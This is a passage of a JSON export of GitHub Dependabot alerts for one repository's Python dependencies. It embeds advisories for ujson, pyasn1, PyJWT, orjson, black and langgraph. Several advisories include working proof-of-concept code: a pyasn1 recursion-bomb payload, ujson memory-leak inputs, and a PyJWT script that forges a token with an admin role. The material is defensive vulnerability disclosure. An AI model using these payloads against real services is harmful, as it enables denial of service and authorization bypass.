5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00069,"percentile":0.21015},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-190","name":"Integer Overflow or Wraparound"},{"cwe_id":"CWE-787","name":"Out-of-bounds Write"},{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 
5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/95","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/95","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":94,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wgvc-ghv9-3pmm","cve_id":"CVE-2026-32874","summary":"UltraJSON has a Memory Leak parsing large integers allows DoS ","description":"#### Summary\n\nujson 5.4.0 to 5.11.0 inclusive contain an accumulating memory leak in JSON parsing _large_ (outside of the range [-2^63, 2^64 - 1]) integers.\n\n#### Exploitability\n\nAny service that calls `ujson.load()`/`ujson.loads()`/`ujson.decode()` on untrusted inputs is affected and vulnerable to denial of service attacks.\n\n#### Details\n\nThe leaked memory is a copy of the string form of the integer plus an additional NULL byte. The leak occurs irrespective of whether the integer parses successfully or is rejected due to having more than `sys.get_int_max_str_digits()` digits, meaning that any sized leak per malicious JSON can be achieved provided that there is no limit on the overall size of the payload.\n\n```python\nujson.loads(str(2 ** 64 - 1)) # No leak\nujson.loads(str(2 ** 64)) # Leaks\nujson.loads(str(10 ** sys.get_int_max_str_digits())) # Leaks and raises ValueError\n```\n\n#### Fix\n\nThe leak is fixed in `ujson 5.12.0` (4baeb950df780092bd3c89fc702a868e99a3a1d2). 
There are no workarounds beyond upgrading to an unaffected version.\n\n#### Credits\n\nDiscovered by Cameron Criswell/Skevros using Coverage-guided fuzzing (libFuzzer + AddressSanitizer)","severity":"high","identifiers":[{"value":"GHSA-wgvc-ghv9-3pmm","type":"GHSA"},{"value":"CVE-2026-32874","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-wgvc-ghv9-3pmm"},{"url":"https://github.com/ultrajson/ultrajson/commit/4baeb950df780092bd3c89fc702a868e99a3a1d2"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32874"},{"url":"https://github.com/advisories/GHSA-wgvc-ghv9-3pmm"}],"published_at":"2026-03-18T13:01:15Z","updated_at":"2026-03-20T21:19:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00073,"percentile":0.22173},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 
5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/94","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/94","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":93,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-jr27-m4p2-rc6r","cve_id":"CVE-2026-30922","summary":"Denial of Service in pyasn1 via Unbounded Recursion","description":"### Summary\nThe `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.\n\n### Details\nThe vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.\nVulnerable Code Locations:\n1. `indefLenValueDecoder` (Line 998):\n```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```\nThis method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.\n\n2. `valueDecoder` (Lines 786 and 907):\n```for component in decodeFun(substrate, componentType, **options):```\nThis method handles standard decoding when a schema is present. 
It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.\n\n4. `_decodeComponentsSchemaless` (Line 661):\n```for component in decodeFun(substrate, **options):```\nThis method handles decoding when no schema is provided.\n\nIn all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.\n\n### PoC\n```\nimport sys\nfrom pyasn1.codec.ber import decoder\n\nsys.setrecursionlimit(100000)\n\nprint(\"[*] Generating Recursion Bomb Payload...\")\ndepth = 50_000\nchunk = b'\\x30\\x80' \npayload = chunk * depth\n\nprint(f\"[*] Payload size: {len(payload) / 1024:.2f} KB\")\nprint(\"[*] Triggering Decoder...\")\n\ntry:\n decoder.decode(payload)\nexcept RecursionError:\n print(\"[!] Crashed: Recursion Limit Hit\")\nexcept MemoryError:\n print(\"[!] Crashed: Out of Memory\")\nexcept Exception as e:\n print(f\"[!] Crashed: {e}\")\n```\n\n```\n[*] Payload size: 9.77 KB\n[*] Triggering Decoder...\n[!] Crashed: Recursion Limit Hit\n```\n\n### Impact\n- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.\n- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.\n- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. 
A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.\n\n### Credits\nVulnerability discovered by Kevin Tu of TMIR at ByteDance.","severity":"high","identifiers":[{"value":"GHSA-jr27-m4p2-rc6r","type":"GHSA"},{"value":"CVE-2026-30922","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"},{"url":"https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30922"},{"url":"https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"},{"url":"http://www.openwall.com/lists/oss-security/2026/03/20/4"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html"},{"url":"https://github.com/advisories/GHSA-jr27-m4p2-rc6r"}],"published_at":"2026-03-17T16:17:33Z","updated_at":"2026-05-01T18:31:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 0.6.2","first_patched_version":{"identifier":"0.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00026,"percentile":0.07182},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 
0.6.2","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/93","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/93","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":92,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"PyJWT"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-752w-5fwx-jx9f","cve_id":"CVE-2026-32597","summary":"PyJWT accepts unknown `crit` header extensions","description":"## Summary\n\nPyJWT does not validate the `crit` (Critical) Header Parameter defined in\nRFC 7515 §4.1.11. When a JWS token contains a `crit` array listing\nextensions that PyJWT does not understand, the library accepts the token\ninstead of rejecting it. This violates the **MUST** requirement in the RFC.\n\nThis is the same class of vulnerability as CVE-2025-59420 (Authlib),\nwhich received CVSS 7.5 (HIGH).\n\n---\n\n## RFC Requirement\n\nRFC 7515 §4.1.11:\n\n> The \"crit\" (Critical) Header Parameter indicates that extensions to this\n> specification and/or [JWA] are being used that **MUST** be understood and\n> processed. [...] 
If any of the listed extension Header Parameters are\n> **not understood and supported** by the recipient, then the **JWS is invalid**.\n\n---\n\n## Proof of Concept\n\n```python\nimport jwt # PyJWT 2.8.0\nimport hmac, hashlib, base64, json\n\n# Construct token with unknown critical extension\nheader = {\"alg\": \"HS256\", \"crit\": [\"x-custom-policy\"], \"x-custom-policy\": \"require-mfa\"}\npayload = {\"sub\": \"attacker\", \"role\": \"admin\"}\n\ndef b64url(data):\n return base64.urlsafe_b64encode(data).rstrip(b\"=\").decode()\n\nh = b64url(json.dumps(header, separators=(\",\", \":\")).encode())\np = b64url(json.dumps(payload, separators=(\",\", \":\")).encode())\nsig = b64url(hmac.new(b\"secret\", f\"{h}.{p}\".encode(), hashlib.sha256).digest())\ntoken = f\"{h}.{p}.{sig}\"\n\n# Should REJECT — x-custom-policy is not understood by PyJWT\ntry:\n result = jwt.decode(token, \"secret\", algorithms=[\"HS256\"])\n print(f\"ACCEPTED: {result}\")\n # Output: ACCEPTED: {'sub': 'attacker', 'role': 'admin'}\nexcept Exception as e:\n print(f\"REJECTED: {e}\")\n```\n\n**Expected:** `jwt.exceptions.InvalidTokenError: Unsupported critical extension: x-custom-policy`\n**Actual:** Token accepted, payload returned.\n\n### Comparison with RFC-compliant library\n\n```python\n# jwcrypto — correctly rejects\nfrom jwcrypto import jwt as jw_jwt, jwk\nkey = jwk.JWK(kty=\"oct\", k=b64url(b\"secret\"))\njw_jwt.JWT(jwt=token, key=key, algs=[\"HS256\"])\n# raises: InvalidJWSObject('Unknown critical header: \"x-custom-policy\"')\n```\n\n---\n\n## Impact\n\n- **Split-brain verification** in mixed-library deployments (e.g., API\n gateway using jwcrypto rejects, backend using PyJWT accepts)\n- **Security policy bypass** when `crit` carries enforcement semantics\n (MFA, token binding, scope restrictions)\n- **Token binding bypass** — RFC 7800 `cnf` (Proof-of-Possession) can be\n silently ignored\n- See CVE-2025-59420 for full impact analysis\n\n---\n\n## Suggested Fix\n\nIn `jwt/api_jwt.py`, 
add validation in `_validate_headers()` or\n`decode()`:\n\n```python\n_SUPPORTED_CRIT = {\"b64\"} # Add extensions PyJWT actually supports\n\ndef _validate_crit(self, headers: dict) -> None:\n crit = headers.get(\"crit\")\n if crit is None:\n return\n if not isinstance(crit, list) or len(crit) == 0:\n raise InvalidTokenError(\"crit must be a non-empty array\")\n for ext in crit:\n if ext not in self._SUPPORTED_CRIT:\n raise InvalidTokenError(f\"Unsupported critical extension: {ext}\")\n if ext not in headers:\n raise InvalidTokenError(f\"Critical extension {ext} not in header\")\n```\n\n---\n\n## CWE\n\n- CWE-345: Insufficient Verification of Data Authenticity\n- CWE-863: Incorrect Authorization\n\n## References\n\n- [RFC 7515 §4.1.11](https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11)\n- [CVE-2025-59420 — Authlib crit bypass (CVSS 7.5)](https://osv.dev/vulnerability/GHSA-9ggr-2464-2j32)\n- [RFC 7800 — Proof-of-Possession Key Semantics](https://www.rfc-editor.org/rfc/rfc7800)","severity":"high","identifiers":[{"value":"GHSA-752w-5fwx-jx9f","type":"GHSA"},{"value":"CVE-2026-32597","type":"CVE"}],"references":[{"url":"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32597"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00008.html"},{"url":"https://github.com/advisories/GHSA-752w-5fwx-jx9f"}],"published_at":"2026-03-13T20:05:04Z","updated_at":"2026-05-05T18:34:23Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 
2.11.0","first_patched_version":{"identifier":"2.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00013,"percentile":0.02358},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"},{"cwe_id":"CWE-863","name":"Incorrect Authorization"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 2.11.0","first_patched_version":{"identifier":"2.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/92","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/92","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":91,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"orjson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-hx9q-6w63-j58v","cve_id":"CVE-2025-67221","summary":"orjson does not limit recursion for deeply nested JSON documents","description":"The orjson.dumps function in orjson before 3.11.6 does not limit recursion for deeply nested JSON 
documents.","severity":"high","identifiers":[{"value":"GHSA-hx9q-6w63-j58v","type":"GHSA"},{"value":"CVE-2025-67221","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-67221"},{"url":"https://github.com/ijl/orjson"},{"url":"https://github.com/kpatsakis/orjson_vulnerability"},{"url":"https://github.com/ijl/orjson/issues/620"},{"url":"https://github.com/kpatsakis/CVE-2025-67221/issues/1"},{"url":"https://github.com/ijl/orjson/commit/62bb185b70785ded49c79c26f8c9781f1e6fe370"},{"url":"https://github.com/advisories/GHSA-hx9q-6w63-j58v"}],"published_at":"2026-01-22T18:30:33Z","updated_at":"2026-03-12T20:49:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 3.11.6","first_patched_version":{"identifier":"3.11.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P","score":7.7}},"epss":{"percentage":0.00025,"percentile":0.06553},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 
3.11.6","first_patched_version":{"identifier":"3.11.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/91","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/91","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":90,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"black"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3936-cmfr-pm3m","cve_id":"CVE-2026-32274","summary":"Black: Arbitrary file writes from unsanitized user input in cache file name","description":"### Impact\n\nBlack writes a cache file, the name of which is computed from various formatting options. The value of the `--python-cell-magics` option was placed in the filename without sanitization, which allowed an attacker who controls the value of this argument to write cache files to arbitrary file system locations. 
\n\n### Patches\n\nFixed in Black 26.3.1.\n\n### Workarounds\n\nDo not allow untrusted user input into the value of the `--python-cell-magics` option.","severity":"high","identifiers":[{"value":"GHSA-3936-cmfr-pm3m","type":"GHSA"},{"value":"CVE-2026-32274","type":"CVE"}],"references":[{"url":"https://github.com/psf/black/security/advisories/GHSA-3936-cmfr-pm3m"},{"url":"https://github.com/psf/black/pull/5038"},{"url":"https://github.com/psf/black/commit/4937fe6cf241139ddbfc16b0bdbb5b422798909d"},{"url":"https://github.com/psf/black/releases/tag/26.3.1"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32274"},{"url":"https://github.com/advisories/GHSA-3936-cmfr-pm3m"}],"published_at":"2026-03-12T18:33:10Z","updated_at":"2026-03-13T13:36:21Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 26.3.1","first_patched_version":{"identifier":"26.3.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","score":8.7}},"epss":{"percentage":0.00021,"percentile":0.05654},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 
26.3.1","first_patched_version":{"identifier":"26.3.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/90","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/90","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":89,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langgraph"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g48c-2wqr-h844","cve_id":"CVE-2026-28277","summary":"LangGraph checkpoint loading has unsafe msgpack deserialization","description":"LangGraph checkpointers can load msgpack-encoded checkpoints that reconstruct Python objects during deserialization. If an attacker can modify checkpoint data in the backing store (for example, after a database compromise or other privileged write access to the persistence layer), they can potentially supply a crafted payload that triggers unsafe object reconstruction when the checkpoint is loaded.\n\nThis is a **post-exploitation / defense-in-depth** issue. Exploitation requires the ability to write attacker-controlled checkpoint bytes at rest. In most deployments that prerequisite already implies a serious incident; the additional risk is turning “checkpoint-store write access” into code execution in the application runtime, which can expand blast radius (for example by exposing environment variables or cloud credentials available to the runtime).\n\nThere is no evidence of exploitation in the wild, and LangGraph is not aware of a practical exploitation path in existing deployments today. 
This change is intended to reduce the blast radius of a checkpoint-store compromise.\n\n## Affected users / systems\n\nUsers may be affected if they:\n\n- use a persistent checkpointer (database, remote store, shared filesystem, etc.),\n- load/resume from checkpoints, and\n- operate in an environment where an attacker could gain privileged write access to checkpoint data in the backing store.\n\nThis issue requires the attacker to be able to modify persisted checkpoint bytes (or to compromise a trusted component that writes them). It is generally not reachable by an unauthenticated remote attacker in a correctly configured deployment.\n\n## Impact\n- Potential **arbitrary code execution** or other unsafe side effects during checkpoint deserialization.\n- Escalation from “write access to checkpoint store” to “code execution in the application runtime,” which may expose runtime secrets or provide access to other systems the runtime can reach.\n\n## Exploitation scenario (high level)\n1. Attacker gains privileged write access to the checkpoint store (for example, via database compromise, leaked credentials, or abuse of an administrative data path).\n2. Attacker writes a crafted checkpoint payload containing msgpack data intended to reconstruct dangerous objects.\n3. 
Application resumes and deserializes the checkpoint; unsafe reconstruction could execute attacker-controlled behavior.\n\n## Mitigation / remediation\nLangGraph provides an allowlist-based hardening mechanism for msgpack checkpoint deserialization.\n\n### Strict mode (environment variable)\n- **`LANGGRAPH_STRICT_MSGPACK`**\n - When set truthy (`1`, `true`, `yes`), the default msgpack deserialization policy becomes strict.\n - Concretely: `JsonPlusSerializer()` will default `allowed_msgpack_modules` to `None` (strict) instead of `True` (warn-and-allow), unless `allowed_msgpack_modules=...` is explicitly passed.\n\n### `allowed_msgpack_modules` (serializer/checkpointer config)\nThis setting controls what msgpack “ext” types are allowed to be reconstructed.\n\n- `True` (default when strict mode is not enabled): allow all ext types, but log a warning when deserializing a type that is not explicitly registered.\n- `None` (strict): only a built-in safe set is reconstructed; other ext types are blocked.\n- `[(module, class_name), ...]` (strict allowlist): the built-in safe set plus exactly the listed symbols are reconstructed (exact-match).\n\n### Built-in safe set\nA small set of types is always treated as safe to reconstruct (for example `datetime` types, `uuid.UUID`, `decimal.Decimal`, `set`/`frozenset`/`deque`, `ipaddress` types, `pathlib` paths, `zoneinfo.ZoneInfo`, compiled regex patterns, and selected LangGraph internal types).\n\n### Automatically derived allowlist (only when compiling graphs)\nWhen `LANGGRAPH_STRICT_MSGPACK` is enabled and `StateGraph` is compiled, LangGraph derives an allowlist from the graph’s schemas and channels and applies it to the checkpointer.\n\n- The allowlist is built by walking the state/input/output/context schemas (plus node/branch input schemas) and channel value/update types. 
It includes Pydantic v1/v2 models, dataclasses, enums, TypedDict field types, and common typing constructs (containers, unions, `Annotated`).\n- LangGraph also includes a curated set of common LangChain message classes.\n\nThis derived allowlist is only applied if the selected checkpointer supports `with_allowlist(...)`. If a user is constructing serializers/checkpointers manually (or using a checkpointer that does not support allowlist propagation), they will need to configure `allowed_msgpack_modules` themselves.\n\n### Operational guidance\n- Treat checkpoint stores as integrity-sensitive. Restrict write access and rotate credentials if compromise is suspected.\n- Enable strict mode (`LANGGRAPH_STRICT_MSGPACK=true`) in production if feasible, and rely on schema-driven allowlisting to reduce incompatibilities.\n- Avoid providing custom msgpack deserialization hooks that reconstruct arbitrary types unless checkpoint data is fully trusted.\n\n## Limitations / important notes\n- If a checkpointer implementation does **not** support allowlist application (i.e., does not implement `with_allowlist`), allowlist enforcement may be skipped (with a warning). In that situation, strict expectations may not hold.\n- If an application supplies a custom msgpack unpack hook (`ext_hook`), the custom hook controls reconstruction and can bypass the default allowlist checks (intentional escape hatch, but it weakens the protection).\n\n## LangSmith / hosted deployments note\nLangSmith is not aware of this issue presenting risk to existing LangSmith-hosted deployments. 
The described threat model requires an attacker to tamper with the checkpoint persistence layer used by the deployment; typical hosted configurations are designed to prevent such access.\n\nFirst reported by: yardenporat353","severity":"medium","identifiers":[{"value":"GHSA-g48c-2wqr-h844","type":"GHSA"},{"value":"CVE-2026-28277","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-g48c-2wqr-h844"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28277"},{"url":"https://github.com/advisories/GHSA-g48c-2wqr-h844"}],"published_at":"2026-03-05T20:19:49Z","updated_at":"2026-03-09T13:19:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 1.0.9","first_patched_version":{"identifier":"1.0.10"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00332,"percentile":0.56073},"cvss":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 
1.0.9","first_patched_version":{"identifier":"1.0.10"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/89","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/89","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":88,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-mhr3-j7m5-c7c9","cve_id":"CVE-2026-27794","summary":"LangGraph: BaseCache Deserialization of Untrusted Data may lead to Remote Code Execution ","description":"## Context\n\nA Remote Code Execution vulnerability exists in LangGraph's caching layer when applications enable cache backends that inherit from `BaseCache` and opt nodes into caching via `CachePolicy`. Prior to `langgraph-checkpoint` 4.0.0, `BaseCache` defaults to `JsonPlusSerializer(pickle_fallback=True)`. When msgpack serialization fails, cached values can be deserialized via `pickle.loads(...)`.\n\n### Who is affected?\n\nCaching is not enabled by default. 
Applications are affected only when:\n\n- The application explicitly enables a cache backend (for example by passing `cache=...` to `StateGraph.compile(...)` or otherwise configuring a `BaseCache` implementation)\n- One or more nodes opt into caching via `CachePolicy`\n- The attacker can write to the cache backend (for example a network-accessible Redis instance with weak/no auth, shared cache infrastructure reachable by other tenants/services, or a writable SQLite cache file)\n\nExample (enabling a cache backend and opting a node into caching):\n\n```py\nfrom langgraph.cache.memory import InMemoryCache\nfrom langgraph.graph import StateGraph\nfrom langgraph.types import CachePolicy\n\n\ndef my_node(state: dict) -> dict:\n return {\"value\": state.get(\"value\", 0) + 1}\n\n\nbuilder = StateGraph(dict)\nbuilder.add_node(\"my_node\", my_node, cache_policy=CachePolicy(ttl=120))\nbuilder.set_entry_point(\"my_node\")\n\ngraph = builder.compile(cache=InMemoryCache())\n\nresult = graph.invoke({\"value\": 1})\n```\n\nWith `pickle_fallback=True`, when msgpack serialization fails, `JsonPlusSerializer` can fall back to storing values as a `(\"pickle\", )` tuple and later deserialize them via `pickle.loads(...)`. If an attacker can place a malicious pickle payload into the cache backend such that the LangGraph process reads and deserializes it, this can lead to arbitrary code execution.\n\nExploitation requires attacker write access to the cache backend. 
The serializer is not exposed as a network-facing API.\n\nThis is fixed in `langgraph-checkpoint>=4.0.0` by disabling pickle fallback by default (`pickle_fallback=False`).\n\n## Impact\n\nArbitrary code execution in the LangGraph process when attacker-controlled cache entries are deserialized.\n\n## Root Cause\n\n- `BaseCache` default serializer configuration inherited by cache implementations (`InMemoryCache`, `RedisCache`, `SqliteCache`):\n - `libs/checkpoint/langgraph/cache/base/__init__.py` (pre-fix default: `JsonPlusSerializer(pickle_fallback=True)`)\n\n- `JsonPlusSerializer` deserialization sink:\n - `libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py`\n - `loads_typed(...)` calls `pickle.loads(data_)` when `type_ == \"pickle\"` and pickle fallback is enabled\n\n## Attack preconditions\n\nAn attacker must be able to write attacker-controlled bytes into the cache backend such that the LangGraph process later reads and deserializes them.\n\nThis typically requires write access to a networked cache (for example a network-accessible Redis instance with weak/no auth or shared cache infrastructure reachable by other tenants/services) or write access to local cache storage (for example a writable SQLite cache file via permissive file permissions or a shared writable volume).\n\nBecause exploitation requires write access to the cache storage layer, this is a post-compromise / post-access escalation vector.\n\n## Remediation\n\n- Upgrade to `langgraph-checkpoint>=4.0.0`.\n\n## Resources\n\n- ZDI-CAN-28385\n- Patch: https://github.com/langchain-ai/langgraph/pull/6677\n- Patch diff: https://patch-diff.githubusercontent.com/raw/langchain-ai/langgraph/pull/6677.patch\n- Credit: Peter Girnus (@gothburz), Demeng Chen, and Brandon Niemczyk (Trend Micro Zero Day 
